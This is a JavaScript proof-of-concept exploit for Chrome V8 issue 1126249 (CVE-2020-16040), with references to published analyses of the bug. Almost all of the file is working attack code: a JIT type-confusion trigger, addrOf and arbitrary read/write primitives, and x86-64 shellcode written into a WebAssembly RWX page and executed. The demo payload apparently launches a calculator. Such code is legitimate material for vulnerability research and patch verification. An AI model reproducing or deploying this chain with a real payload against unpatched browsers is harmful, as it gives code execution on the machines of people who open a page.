chrome-v8-issue-1126249.js

class Helpers {

 constructor() {
  this.cvt_buf = new ArrayBuffer(8);
  this.cvt_f64a = new Float64Array(this.cvt_buf);
  this.cvt_u64a = new BigUint64Array(this.cvt_buf);
  this.cvt_u32a = new Uint32Array(this.cvt_buf);
 }

 ftoi(f) {
  this.cvt_f64a[0] = f;
  return this.cvt_u64a[0];
 }

 itof(i) {
  this.cvt_u64a[0] = i;
  return this.cvt_f64a[0];
 }

 ftoil(f) {
  this.cvt_f64a[0] = f;
  return this.cvt_u32a[0];
 }

 ftoih(f) {
  this.cvt_f64a[0] = f;
  return this.cvt_u32a[1];
 }

 fsetil(f, l) {
  this.cvt_f64a[0] = f;
  this.cvt_u32a[0] = l;
  return this.cvt_f64a[0];
 }

 fsetih(f, h) {
  this.cvt_f64a[0] = f;
  this.cvt_u32a[1] = h;
  return this.cvt_f64a[0];
 }

 isetltof(i, l) {
  this.cvt_u64a[0] = i;
  this.cvt_u32a[0] = l;
  return this.cvt_f64a[0];
 }

 isethtof(i, h) {
  this.cvt_u64a[0] = i;
  this.cvt_u32a[1] = h;
  return this.cvt_f64a[0];
 }

 igetl(i) {
  this.cvt_u64a[0] = i;
  return this.cvt_u32a[0];
 }

 igeth(i) {
  this.cvt_u64a[0] = i;
  return this.cvt_u32a[1];
 }

 gc() { for(let i = 0; i < 100; i++) { new ArrayBuffer(0x1000000); } }
 printhex( s, val ) { alert(s + '0x' + val.toString(16)); }

};

function trigger(a) {
 let minusZero = -0;
 var p = -0x80000000;
 if ( a ) {
  minusZero = -1;
  p = 1;
 }
 p = minusZero - p;
 p = p + 0;
 p = Math.max(-4, p);
 p = -p;
 p += 1;
 p = Math.max(p, 1);
 p += 1;
 p >>= 1;
 p -= 2;
 let arr = Array(p);
 let arr_two = [1.1,2.2,3.3];
 arr.pop();
 return [p, arr, arr_two];
}
function pwn() {

 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
 var wasm_mod = new WebAssembly.Module(wasm_code);
 var wasm_instance = new WebAssembly.Instance(wasm_mod);
 var f = wasm_instance.exports.main;
 let helper = new Helpers();
 var buf = new ArrayBuffer(0x100);
 var dataview = new DataView(buf);

 for (let i = 0; i < 0x10000; i++) { trigger(true); }
 helper.gc();
 let a = trigger(false);
 let o = a[1];
 let corrupted_arr = a[2];
 let object_arr = [corrupted_arr, {}];
 let simple_arr = [1.1,2.2,3.3,4.4,5.5];
 o[16] = 0x4141;

 var double_arr_map = helper.ftoi(corrupted_arr[3]) & 0xffffffffn;
 var object_arr_map = helper.ftoi(corrupted_arr[7]) >> 32n;
 helper.printhex("Double array map: ", double_arr_map);
 helper.printhex("Object array map: ", object_arr_map);

 function addrOf(object) {
  object_arr[0] = object;
  return helper.ftoi(corrupted_arr[15]) >> 32n;
 }

 var w_instance = addrOf(wasm_instance);
 helper.printhex("WASM : ",w_instance);

 function arbRead( where ) {
  corrupted_arr[28] = helper.itof( (6n << 32n) + where );
  return helper.ftoi(simple_arr[0]);
 }

 var RWX_PAGE = arbRead( w_instance + 0x60n );
 helper.printhex("RWX: ",RWX_PAGE);

 function arbWrite( where, what ) {
  corrupted_arr[28] = helper.itof( (6n << 32n) + where );
  simple_arr[0] = helper.itof(what);
 }

 var buf_addr = addrOf(buf);
 var backing_store = buf_addr + 0xcn;

 var shellcode = [0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];01
 arbWrite( backing_store, RWX_PAGE);
 for(var i = 0; i < shellcode.length; i++) {
  dataview.setUint32(4 * i, shellcode[i], true);
 }
 f();
}
pwn();
/* References
https://bugs.chromium.org/p/chromium/issues/detail?id=1126249
https://googleprojectzero.blogspot.com/2021/01/in-wild-series-chrome-infinity-bug.html
https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
https://doar-e.github.io/blog/2020/11/17/modern-attacks-on-the-chrome-browser-optimizations-and-deoptimizations/
https://doar-e.github.io/blog/2019/05/09/circumventing-chromes-hardening-of-typer-bugs/
*/